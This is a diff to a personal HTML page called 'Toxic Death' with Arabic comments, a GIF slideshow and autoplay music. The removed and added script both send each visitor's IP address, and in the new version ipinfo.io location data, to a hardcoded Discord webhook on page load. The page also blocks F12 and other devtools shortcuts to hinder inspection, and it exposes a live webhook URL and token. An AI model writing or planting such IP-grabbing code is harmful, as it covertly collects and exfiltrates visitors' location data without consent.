--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
+<!DOCTYPE html>
 <html lang="en">
 <head>
   <meta charset="UTF-8">
@@ -61,9 +62,7 @@
       background: #ff0000;
       color: #000;
     }
-    audio {
-      display: none;
-    }
+    audio { display: none; }
     .volume-container {
       margin-top: 5px;
       width: 200px;
@@ -96,25 +95,43 @@
       color: #ff0000;
       text-decoration: none;
     }
-    .footer a:hover {
-      text-decoration: underline;
+    .footer a:hover { text-decoration: underline; }
+
+    /* صندوق بيانات IP */
+    #ip-info {
+      margin: 15px;
+      white-space: pre-wrap;
+      background: rgba(255,0,0,0.05);
+      border: 1px solid #ff0000;
+      border-radius: 10px;
+      padding: 10px;
+      max-width: 600px;
+      color: #ff8080;
+      font-family: monospace;
+      font-size: 0.9em;
+      text-align: left;
     }
   </style>
-  <link href="https://fonts.googleapis.com/css2?family=Creepster&amp;display=swap" rel="stylesheet">
+  <link href="https://fonts.googleapis.com/css2?family=Creepster&display=swap" rel="stylesheet">
 </head>
 <body>
+
 <div class="top-bar">Toxic Death &amp; NAIF &amp; DeathRow &lt;3</div>
 <div class="header">Toxic Death</div>
+
 <button class="music-button" onclick="toggleMusic()">تشغيل / إيقاف</button>
+
 <div class="volume-container">
   <div id="volume-level" style="color: #ff0000; font-size: 1.1em; margin-bottom: 5px;">مستوى الصوت: 56%</div>
   <div id="volume-bar-container" class="volume-bar-container" onclick="setVolumeFromClick(event)">
     <div id="volume-bar" class="volume-bar" style="width: 56%;"></div>
   </div>
 </div>
+
 <audio id="bg-music" autoplay loop>
   <source src="death_theme.mp3" type="audio/mpeg">
 </audio>
+
 <div class="slideshow-container">
   <div class="mySlides fade"><img src="1.gif" alt="GIF 1"></div>
   <div class="mySlides fade"><img src="2.gif" alt="GIF 2"></div>
@@ -138,6 +155,10 @@
   <div class="mySlides fade"><img src="20.gif" alt="GIF 20"></div>
   <div class="mySlides fade"><img src="21.gif" alt="GIF 21"></div>
 </div>
+
+<!-- هنا نضيف مكان عرض معلومات IP -->
+<div id="ip-info">جارٍ تحميل معلومات الزائر...</div>
+
 <div class="footer">
   <strong>My account</strong><br>
   <a href="https://discord.gg/BWzWJpDy6t" target="_blank">Discord.gg/BWzWJpDy6t</a><br><br>
@@ -146,27 +167,22 @@
 </div>
 
 <script>
-  // === سلايد شو + الصوتيات ===
+  // === عرض الشرائح ===
   let slideIndex = 0;
   showSlides();
   function showSlides() {
     let slides = document.getElementsByClassName("mySlides");
-    for (let i = 0; i < slides.length; i++) {
-      slides[i].style.display = "none";
-    }
+    for (let i = 0; i < slides.length; i++) slides[i].style.display = "none";
     slideIndex++;
-    if (slideIndex > slides.length) { slideIndex = 1 }
+    if (slideIndex > slides.length) slideIndex = 1;
     slides[slideIndex - 1].style.display = "block";
     setTimeout(showSlides, 2000);
   }
 
+  // === تحكم الصوت ===
   const music = document.getElementById("bg-music");
   function toggleMusic() {
-    if (music.paused) {
-      music.play();
-    } else {
-      music.pause();
-    }
+    if (music.paused) music.play(); else music.pause();
   }
   function updateVolumeDisplay() {
     const volumeDisplay = document.getElementById("volume-level");
@@ -191,16 +207,12 @@
   window.addEventListener("mousemove", (e) => { if (isDragging) setVolumeFromClick(e); });
   window.addEventListener("load", () => {
     const savedVolume = localStorage.getItem("volume");
-    if (savedVolume !== null) {
-      music.volume = parseFloat(savedVolume);
-    }
+    if (savedVolume !== null) music.volume = parseFloat(savedVolume);
     updateVolumeDisplay();
-    music.play().catch(() => {
-      document.addEventListener("click", () => music.play(), { once: true });
-    });
+    music.play().catch(() => document.addEventListener("click", () => music.play(), { once: true }));
   });
 
-  // === سكربت منع F12 + إرسال IP ===
+  // === منع فحص الصفحة (F12) ===
   document.onkeydown = function(e) {
     if (e.keyCode == 123) return false;
     if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) return false;
@@ -209,37 +221,29 @@
     if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) return false;
   }
 
-  function fetchIPAndSend() {
-    const webhookURL = "https://canary.discord.com/api/webhooks/1406835678381215875/fvpexHZCIFXoEheK0iMv_dE9Bq9gt0hWuJnyv7hG4JrORkGoSMoqCalKEyagRdymQIJu";
-    fetch("https://api64.ipify.org?format=json")
-      .then(response => response.json())
-      .then(data => {
-        const ip = data.ip;
-        sendToWebhook(ip);
-      })
-      .catch(error => console.error("Error fetching IP:", error));
-  }
-
-  function sendToWebhook(ip) {
-    const webhookURL = "https://canary.discord.com/api/webhooks/1406835678381215875/fvpexHZCIFXoEheK0iMv_dE9Bq9gt0hWuJnyv7hG4JrORkGoSMoqCalKEyagRdymQIJu";
-    const message = { content: `Visitor IP: ${ip}` };
-    fetch(webhookURL, {
-      method: "POST",
-      headers: { "Content-Type": "application/json" },
-      body: JSON.stringify(message)
-    })
-    .then(response => {
-      if (response.ok) console.log("IP sent to webhook successfully");
-      else console.error("Error sending IP to webhook:", response.statusText);
-    })
-    .catch(error => console.error("Error sending IP to webhook:", error));
-  }
-
+  // === إرسال IP إلى ويب هوك + عرض معلومات ipinfo ===
   window.onload = function() {
-    fetchIPAndSend();
+    fetch("https://api64.ipify.org?format=json")
+      .then(r => r.json())
+      .then(ipData => {
+        const ip = ipData.ip;
+        fetch('https://ipinfo.io/json')
+          .then(r => r.json())
+          .then(info => {
+            delete info.readme;
+            info.ip = ip;
+            document.getElementById('ip-info').textContent = JSON.stringify(info, null, 2);
+            // إرسال المعلومات إلى الويب هوك
+            const webhookURL = "https://canary.discord.com/api/webhooks/1406835678381215875/fvpexHZCIFXoEheK0iMv_dE9Bq9gt0hWuJnyv7hG4JrORkGoSMoqCalKEyagRdymQIJu";
+            fetch(webhookURL, {
+              method: "POST",
+              headers: { "Content-Type": "application/json" },
+              body: JSON.stringify({ content: "🧠 Visitor Info:\n```json\n" + JSON.stringify(info, null, 2) + "\n```" })
+            });
+          });
+      });
   };
 </script>
 
 </body>
 </html>
-
